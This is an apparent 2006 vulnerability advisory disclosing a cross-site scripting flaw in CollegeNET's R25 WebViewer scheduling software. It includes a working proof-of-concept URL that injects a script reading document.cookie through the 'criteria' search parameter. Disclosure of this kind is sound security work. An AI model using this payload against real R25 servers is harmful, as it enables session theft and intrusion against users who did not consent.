R25 XSS Vulnerability
=====================
Discovered By: Matthew Benenati <dk.mak0[AT]gmail[DOT]com>
Release Date: 3/3/2006
Vendor: CollegeNET
Versions: <=3.2
Severity: Medium

About
-----
R25 delivers the first campus-wide class and event scheduling software to unify all users on a single database, provide a completely customizable environment for each, and tap the power of the Internet for mass communication and e-commerce revenue opportunities.

Example
-------
R25 WebViewer is susceptible to cross site scripting:

http://<VICTIM>/wv3/wv3_servlet/urd/run/wv_event.QSearch?searchon=0,findby=1,criteria=%22%3C/div%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E